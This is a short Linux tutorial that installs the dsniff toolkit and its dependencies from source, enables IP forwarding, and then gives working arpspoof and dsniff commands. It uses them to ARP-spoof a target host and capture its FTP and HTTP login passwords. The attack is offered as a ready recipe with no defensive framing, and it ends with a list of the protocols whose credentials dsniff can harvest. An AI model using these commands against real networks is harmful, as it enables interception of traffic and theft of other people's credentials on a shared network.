wget:
http://www.3est.com/linux/openssl-0.9.7i.tar.gz
http://www.3est.com/linux/libnids-1.18.tar.gz
http://www.3est.com/linux/libpcap-0.7.2.tar.gz
http://www.3est.com/linux/libnet-1.0.2a.tar.gz
http://www.3est.com/linux/db-4.7.25.tar.gz
http://www.3est.com/linux/dsniff-2.3.tar.gz
I. Install gcc
# yum -y install gcc
II. Install openssl
# tar zxvf openssl-0.9.7i.tar.gz
# cd openssl-0.9.7i
# ./config
# make
# make install
III. Install flex and bison
# yum -y install flex
# yum -y install bison
IV. Install libpcap
# tar zxvf libpcap-0.7.2.tar.gz
# cd libpcap-0.7.2
# ./configure
# make
# make install
V. Install libnet
# tar zxvf libnet-1.0.2a.tar.gz
# cd Libnet-1.0.2a
# ./configure
# make
# make install
VI. Install libnids
# tar zxvf libnids-1.18.tar.gz
# cd libnids-1.18
# ./configure
# make
# make install
VII. Install BerkeleyDB
# tar zxvf db-4.7.25.tar.gz
# cd db-4.7.25/build_unix
# ../dist/configure --enable-compat185
# make
# make install
VIII. Install dsniff
# tar zxvf dsniff-2.3.tar.gz
# cd dsniff-2.3
# vi arp.c
Add #include "memory.h"
# ./configure --enable-compat185 --with-db=/usr/local/BerkeleyDB.4.7
# make
# make install
IX. Other settings
# vi /etc/sysctl.conf
Set net.ipv4.ip_forward = 1 (so that A forwards the traffic it receives from B on to the gateway)
# sysctl -p
X. Using dsniff
# cp /usr/local/BerkeleyDB.4.7/lib/libdb-4.7.so /usr/lib
# cd /usr/local/sbin;ls
# ./dsniff --help
Environment:
Gateway --> 192.168.0.1
A --> 192.168.0.123 (CentOS + dsniff-2.3)
B --> 192.168.0.125 (CentOS)
Goal:
Use A to sniff B's FTP and HTTP login passwords
1. Use arpspoof to carry out an ARP spoofing attack against the target machine
# arpspoof -i eth0 -t 192.168.0.125 192.168.0.1
2. Use dsniff to capture the data on the specified ports
# dsniff -i eth0 -t 21/tcp=ftp,80/tcp=http
Protocol types supported by dsniff include:
FTP, Telnet, SMTP, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP, MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, and Sybase and Microsoft SQL authentication information